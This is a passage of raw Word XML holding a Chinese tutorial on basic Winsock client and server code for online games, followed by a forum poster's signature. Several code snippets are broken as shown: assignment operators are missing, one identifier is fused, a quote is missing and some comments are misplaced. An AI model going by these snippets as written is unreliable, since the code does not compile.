      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的创建，代码片段如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">SOCKET sSocket socket( AF_INET, m_lProtocol, 0 ); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">if( sSocket == INVALID_SOCKET ) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Failed( "WinSocket Create Error&amp;#33;" );</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这里需要说明，客户端和服务端所需要的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接数量是不同的，客户端只需要一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接足以满足游戏的需要，而服务端必须为每个玩家用户创建一个用于通讯的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接。当然，并不是说如果服务器上没有玩家那就不需要创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接，服务器端在启动之时会生成一个特殊的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用来对玩家创建与服务器连接的请求进行响应，等介绍网络监听部分后会有更详细说明。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　有初始化与创建必然就有释放与删除，让我们看看下面的释放部分：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">if( sSocket &amp;#33;= INVALID_SOCKET ) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>closesocket( sSocket );</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>if( WSACleanup() &amp;#33;= 0 )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Warning( "Can&amp;#39;t release Winsocket" ); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">} </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　这里两个步骤分别对前面所作的创建初始化进行了相应释放。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　接下来看看服务器端的一个网络执行处理，这里我们假设服务器端已经创建好一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>供使用，我们要做的就是让这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变成监听网络连接请求的专用接口，看看下面代码片段：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>SOCKADDR_IN addr;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>memset( &amp;addr, 0, sizeof(addr) );</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>addr.sin_family = AF_INET;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>addr.sin_addr.s_addr = htonl( INADDR_ANY );</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">addr.sin_port = htons( Port ); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>// Port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为要监听的端口号</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绑定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>if( bind( sSocket, (SOCKADDR*)&amp;addr, sizeof(addr) ) == SOCKET_ERROR )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Failed( "WinSocket Bind Error&amp;#33;");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行监听</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>if( listen( sSocket, SOMAXCONN ) == SOCKET_ERROR )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Failed( "WinSocket Listen Error&amp;#33;");</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这里使用的是阻塞式通讯处理，此时程序将处于等待玩家用户连接的状态，倘若这时候有客户端连接进来，则通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>accept()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来创建针对此玩家用户的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接，代码片段如下：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">sockaddraddrServer; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">int nLen sizeof( addrServer ); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">SOCKET sPlayerSocket accept( sSocket, &amp;addrServer, &amp;nLen ); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>if( sPlayerSocket == INVALID_SOCKET )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">{ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Failed( WinSocket Accept Error&amp;#33;"); </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这里我们创建了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sPlayerSocket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接，此后游戏服务器与这个玩家用户的通讯全部通过此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行，到这里为止，我们服务器已经有了接受玩家用户连接的功能，现在让我们来看看游戏客户端是如何连接到游戏服务器上，代码片段如下：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>SOCKADDR_IN addr;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>memset( &amp;addr, 0, sizeof(addr) );</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">addr.sin_family = AF_INET;// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要连接的游戏服务器端口号</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">addr.sin_addr.s_addr = inet_addr( IP );// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要连接的游戏服务器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>addr.sin_port = htons( Port );//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到此，客户端和服务器已经有了通讯的桥梁，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来就是进行数据的发送和接收：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>connect( sSocket, (SOCKADDR*)&amp;addr, sizeof(addr) );</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>if( send( sSocket, pBuffer, lLength, 0 ) == SOCKET_ERROR )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Failed( "WinSocket Send Error&amp;#33;");</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这里的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pBuffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为要发送的数据缓冲指针，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lLength</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为需要发送的数据长度，通过这支</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Socket API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，我们无论在客户端或者服务端都可以进行数据的发送工作，同时，我们可以通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>recv()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这支</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Socket API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数来进行数据接收：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>if( recv( sSocket, pBuffer, lLength, 0 ) == SOCKET_ERROR )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Failed( "WinSocket Recv Error&amp;#33;"); </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其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pBuffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用来存储获取的网络数据缓冲，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lLength</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>则为需要获取的数据长度。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　现在，我们已经了解了一些网络互连的基本知识，但作为网络游戏，如此简单的连接方式是无法满足网络游戏中百人千人同时在线的，我们需要更合理容错性更强的网络通讯处理方式，当然，我们需要先了解一下网络游戏对网络通讯的需求是怎样的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>goodmorning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集整理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>勿删除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>既然不能洁身自好，不如就同流合污吧。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我的群：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3595054  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">UID41288 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>帖子</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">34145 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>精华</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>积分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">68377 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现金</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>482  cfan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>币</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">0  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>阅读权限</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">120 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来自我忘记了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在线时间</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">835 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>小时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册时间</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2003-12-17 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2010-3-10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看个人网站</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看详细资料</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve"> TOP </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">zdd_807 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CFan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大学士</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
